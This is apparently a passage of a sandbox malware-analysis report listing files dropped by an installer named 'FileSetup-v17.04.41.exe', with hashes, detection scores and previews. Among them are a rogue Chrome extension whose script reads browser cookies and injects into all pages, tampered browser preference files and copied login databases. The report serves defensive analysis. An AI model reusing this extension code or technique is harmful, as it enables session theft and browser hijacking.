                                                                                                                                          Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\popup.html
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):280
                                                                                                                                          Entropy (8bit):5.048307538221611
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                          MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                          SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                          SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                          SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\popup.js
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):642
                                                                                                                                          Entropy (8bit):4.985939227199713
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                          MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                          SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                          SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                          SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with very long lines
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5468
                                                                                                                                          Entropy (8bit):5.1800878480421595
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:nq6CbKM/XwdVTcVPyk0JCKL8eGbOEQVuwv:nq6Cbh/gdVTcy4K7
                                                                                                                                          MD5:A90938265B6DF6F8D8007CF37C8A153C
                                                                                                                                          SHA1:54CFD3EEDE08050B1335C960CD291D7C515FEBBF
                                                                                                                                          SHA-256:751935F19D34C81BA1674BB9094520A50A7ACA9C76266D7C0DD53BAE374AA78E
                                                                                                                                          SHA-512:78ADE8BAE7AF44E2D67E59CED3D30F1CF72BA85A308FB83E2C87B7AF51E82A74DAAA7A3279D7B50FD457E3C85FC79ABB90EC8FEA71AD0BBA001EB5B6D45279D5
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245951485918895","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):34636
                                                                                                                                          Entropy (8bit):5.539252667637914
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:gEyODiUckPW/r+yqLlCL1kXqKf/pUZNCgVLH2Hf6rUQGAnLh/e:RAELlvAnw
                                                                                                                                          MD5:20852E36F67055E9F64A729268688E0C
                                                                                                                                          SHA1:292FCB85D375F7A6655DD38FE9D87C6ADB4451ED
                                                                                                                                          SHA-256:FA0B6CD58289D9C9EF23A0C5D952BC19620F5598E5B0F7CC519084E165642CBD
                                                                                                                                          SHA-512:EF107364C9F7563A84B886B59C18F4619CD27C3D62208B7EE329AA172F12E77D332B59DCE9F8DD79FB344D65906223C592ED501AC4D4A43B209F4C6D087E99E0
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951492913444","lastpingday":"13245947458072931","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                          C:\Users\user\AppData\Local\Login Data1611946677837
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40960
                                                                                                                                          Entropy (8bit):0.792852251086831
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Login Data1611946694087
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40960
                                                                                                                                          Entropy (8bit):0.792852251086831
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1611946680743
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:7-zip archive data, version 0.3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):37737
                                                                                                                                          Entropy (8bit):7.994967159065528
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                          MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                          SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                          SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                          SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n*.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\....*.f.q.=..t...).<|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....|..^.+RP]...D.jq.z'..4.|I*......jq..w.%..2/|.....>..y...>......C.)8B7$Z...{P.~..&...b..........
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1611946681946
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:7-zip archive data, version 0.3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):553040
                                                                                                                                          Entropy (8bit):7.999671101282436
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                          MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                          SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                          SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                          SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A)*:..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.*Y..'*....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA*.2...O......|....Drrl)..7..9.....pNj.P6|].t .'.|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9
                                                                                                                                          C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          Process:C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4592400
                                                                                                                                          Entropy (8bit):7.814257274870527
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:4u181qMJuVwd7Qld5ElgJQaQsPRT2KJLNx6DfgteKbeOJ:n294g7QxElWQaQyRTXy4vJ
                                                                                                                                          MD5:B7234E4A9AAAACEFA890535F8117C8FC
                                                                                                                                          SHA1:24C4321111FF004105C14E29662682F16900DE29
                                                                                                                                          SHA-256:A8FEFE8E1F92A30D1CDD4E2E2AFAACF08A02C8961F496EE16E89062417EC5F28
                                                                                                                                          SHA-512:8590BE6433943BEC0867A18247E25D9821D39DB1D06C6957D3895558EB5568DDDFF0B97ACDA222F0A16701C50DE43D8AD667D6717ADD6900EC941E71CA28E513
                                                                                                                                          Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 48%
Joe Sandbox View:
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                          Preview: MZ......................@..................................................L.!This program cannot be run in DOS mode....$.......P,...M.^.M.^.M.^...^.M.^3..^5M.^3..^OM.^.B.^.M.^.B.^.M.^.M.^3L.^.M.^.M.^3..^OO.^3..^/M.^3..^.M.^3..^.M.^Rich.M.^........................PE..L......V.................P...........M.......`....@..................................2.......................................8....... ..............`...#.......... d..................................@............`..|....6..@....................text....J.......P.................. ....rdata.......`.......`..............@..@.data...D....P.......P..............@....rsrc....... ......................@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe:Zone.Identifier
                                                                                                                                          Process:C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26
                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                          C:\Users\user\AppData\Local\Temp\MSI61C2.tmp
                                                                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):6656
                                                                                                                                          Entropy (8bit):5.2861874904617645
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                          MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                          SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                          SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                          SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                          Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):268744
                                                                                                                                          Entropy (8bit):5.398284390686728
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
                                                                                                                                          MD5:E2E9483568DC53F68BE0B80C34FE27FB
                                                                                                                                          SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
                                                                                                                                          SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
                                                                                                                                          SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
                                                                                                                                          Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 8%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73160
                                                                                                                                          Entropy (8bit):6.49500452335621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
                                                                                                                                          MD5:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                          SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
                                                                                                                                          SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
                                                                                                                                          SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
                                                                                                                                          Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):89600
                                                                                                                                          Entropy (8bit):6.46929682960805
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
                                                                                                                                          MD5:79CB6457C81ADA9EB7F2087CE799AAA7
                                                                                                                                          SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
                                                                                                                                          SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
                                                                                                                                          SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):92080
                                                                                                                                          Entropy (8bit):5.923150781730819
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                          MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                          SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                          SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
                                                                                                                                          SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.|...|...|...t...|...p...|...p...|...p...|...p...|..~t...|..._...|...t...|..~t...|...|..6|..sk...|..sk...|...w...|..sk...|..Rich.|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\download_engine.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3512776
                                                                                                                                          Entropy (8bit):6.514740710935125
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                          MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                          SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                          SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                          SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):503808
                                                                                                                                          Entropy (8bit):6.4043708480235715
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                          MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                          SHA1:F936F612BC779E4BA067F77514B68C329180A380
